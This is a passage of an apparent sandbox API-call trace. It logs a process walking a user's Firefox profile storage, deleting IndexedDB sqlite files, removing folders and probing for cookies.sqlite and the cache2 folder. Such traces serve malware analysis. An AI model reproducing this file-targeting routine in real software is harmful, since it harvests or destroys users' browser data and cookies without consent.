lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\*.*", lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 0x4430170 [0253.311] FindNextFileW (in: hFindFile=0x4430170, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.311] FindNextFileW (in: hFindFile=0x4430170, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.311] lstrlenW (lpString="chrome") returned 6 [0253.311] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="chrome" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" [0253.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome") returned 104 [0253.311] PathCombineW (in: pszDest=0x79c8fe0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*.*" [0253.311] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\*.*", lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0x4430290 [0253.311] FindNextFileW (in: hFindFile=0x4430290, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.311] FindNextFileW (in: hFindFile=0x4430290, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.311] FindNextFileW (in: hFindFile=0x4430290, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.311] FindNextFileW (in: hFindFile=0x4430290, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.311] lstrlenW (lpString="idb") returned 3 [0253.311] PathCombineW (in: pszDest=0x79c8dd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" [0253.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb") returned 108 [0253.311] PathCombineW (in: pszDest=0x7aaf270, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*.*" [0253.311] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\*.*", lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0x442f570 [0253.311] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.311] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.311] lstrlenW (lpString="2918063365piupsah.files") returned 23 [0253.311] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="2918063365piupsah.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" [0253.311] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files") returned 132 [0253.311] PathCombineW (in: pszDest=0x79b1ce0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*.*" [0253.312] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files\\*.*", lpFindFileData=0x79b1e00 | out: lpFindFileData=0x79b1e00) returned 0x442fc30 [0253.312] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x79b1e00 | out: lpFindFileData=0x79b1e00) returned 1 [0253.312] FindNextFileW (in: hFindFile=0x442fc30, lpFindFileData=0x79b1e00 | out: lpFindFileData=0x79b1e00) returned 0 [0253.312] FindClose (in: hFindFile=0x442fc30 | out: hFindFile=0x442fc30) returned 1 [0253.312] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.files")) returned 1 [0253.312] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.312] lstrlenW (lpString="2918063365piupsah.sqlite") returned 24 [0253.312] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb", pszFile="2918063365piupsah.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" [0253.312] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite")) returned 1 [0253.313] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0 [0253.313] FindClose (in: hFindFile=0x442f570 | out: hFindFile=0x442f570) returned 1 [0253.313] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb")) returned 1 [0253.314] FindNextFileW (in: hFindFile=0x4430290, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0 [0253.314] FindClose (in: hFindFile=0x4430290 | out: hFindFile=0x4430290) returned 1 [0253.314] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\chrome")) returned 0 [0253.315] FindNextFileW (in: hFindFile=0x4430170, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.315] lstrlenW (lpString="moz-safe-about+home") returned 19 [0253.315] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent", pszFile="moz-safe-about+home" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" [0253.315] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home") returned 117 [0253.315] PathCombineW (in: pszDest=0x7aaf270, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*.*" [0253.315] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\*.*", lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0x4430410 [0253.315] FindNextFileW (in: hFindFile=0x4430410, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.315] FindNextFileW (in: hFindFile=0x4430410, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.315] FindNextFileW (in: hFindFile=0x4430410, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.315] FindNextFileW (in: hFindFile=0x4430410, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 1 [0253.315] lstrlenW (lpString="idb") returned 3 [0253.315] PathCombineW (in: pszDest=0x79c8dd0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home", pszFile="idb" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" [0253.315] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb") returned 121 [0253.315] PathCombineW (in: pszDest=0x79ce150, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*.*" [0253.315] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\*.*", lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0x442f930 [0253.315] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.315] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.315] lstrlenW (lpString="818200132aebmoouht.files") returned 24 [0253.315] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="818200132aebmoouht.files" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" [0253.315] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files") returned 146 [0253.315] PathCombineW (in: pszDest=0x79b1ce0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*.*" [0253.315] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\*.*", lpFindFileData=0x79b1e20 | out: lpFindFileData=0x79b1e20) returned 0x442f570 [0253.316] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1e20 | out: lpFindFileData=0x79b1e20) returned 1 [0253.316] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1e20 | out: lpFindFileData=0x79b1e20) returned 1 [0253.316] lstrlenW (lpString="1") returned 1 [0253.316] PathCombineW (in: pszDest=0x79b1ad0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="1" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" [0253.316] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\1")) returned 1 [0253.316] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1e20 | out: lpFindFileData=0x79b1e20) returned 1 [0253.316] lstrlenW (lpString="journals") returned 8 [0253.316] PathCombineW (in: pszDest=0x79b1ad0, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files", pszFile="journals" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" [0253.316] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals") returned 155 [0253.317] PathCombineW (in: pszDest=0x79b2290, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*.*" [0253.317] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals\\*.*", lpFindFileData=0x79ca0e0 | out: lpFindFileData=0x79ca0e0) returned 0x442f6f0 [0253.317] FindNextFileW (in: hFindFile=0x442f6f0, lpFindFileData=0x79ca0e0 | out: lpFindFileData=0x79ca0e0) returned 1 [0253.317] FindNextFileW (in: hFindFile=0x442f6f0, lpFindFileData=0x79ca0e0 | out: lpFindFileData=0x79ca0e0) returned 0 [0253.317] FindClose (in: hFindFile=0x442f6f0 | out: hFindFile=0x442f6f0) returned 1 [0253.317] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files\\journals")) returned 1 [0253.317] FindNextFileW (in: hFindFile=0x442f570, lpFindFileData=0x79b1e20 | out: lpFindFileData=0x79b1e20) returned 0 [0253.317] FindClose (in: hFindFile=0x442f570 | out: hFindFile=0x442f570) returned 1 [0253.317] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.files")) returned 1 [0253.318] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 1 [0253.318] lstrlenW (lpString="818200132aebmoouht.sqlite") returned 25 [0253.318] PathCombineW (in: pszDest=0x79b1660, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb", pszFile="818200132aebmoouht.sqlite" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" [0253.318] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite")) returned 1 [0253.318] FindNextFileW (in: hFindFile=0x442f930, lpFindFileData=0x79b1870 | out: lpFindFileData=0x79b1870) returned 0 [0253.318] FindClose (in: hFindFile=0x442f930 | out: hFindFile=0x442f930) returned 1 [0253.319] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb")) returned 1 [0253.319] FindNextFileW (in: hFindFile=0x4430410, lpFindFileData=0x79b1400 | out: lpFindFileData=0x79b1400) returned 0 [0253.319] FindClose (in: hFindFile=0x4430410 | out: hFindFile=0x4430410) returned 1 [0253.320] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home")) returned 0 [0253.320] FindNextFileW (in: hFindFile=0x4430170, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 0 [0253.320] FindClose (in: hFindFile=0x4430170 | out: hFindFile=0x4430170) returned 1 [0253.320] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\storage\\permanent")) returned 0 [0253.320] FindNextFileW (in: hFindFile=0x442fe10, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 0 [0253.320] FindClose (in: hFindFile=0x442fe10 | out: hFindFile=0x442fe10) returned 1 [0253.320] lstrcpyW (in: lpString1=0x79cd460, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\" [0253.320] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0253.320] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\cookies.sqlite" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" [0253.320] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\cookies.sqlite")) returned 0xffffffff [0253.321] FindNextFileW (in: hFindFile=0x44306b0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 0 [0253.321] FindClose (in: hFindFile=0x44306b0 | out: hFindFile=0x44306b0) returned 1 [0253.321] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x7aaeab0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 0x0 [0253.321] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local", lpString2="\\Mozilla\\Firefox\\Profiles\\*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*" [0253.321] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*", lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 0x44304d0 [0253.322] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\*") returned 62 [0253.322] FindNextFileW (in: hFindFile=0x44304d0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 1 [0253.322] FindNextFileW (in: hFindFile=0x44304d0, lpFindFileData=0x44dfcc0 | out: lpFindFileData=0x44dfcc0) returned 1 [0253.322] lstrcpyW (in: lpString1=0x79cdac0, lpString2="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\" [0253.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\", lpString2="8i341t8m.default" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default" [0253.322] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default", lpString2="\\cache2\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\" [0253.322] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\" (normalized: 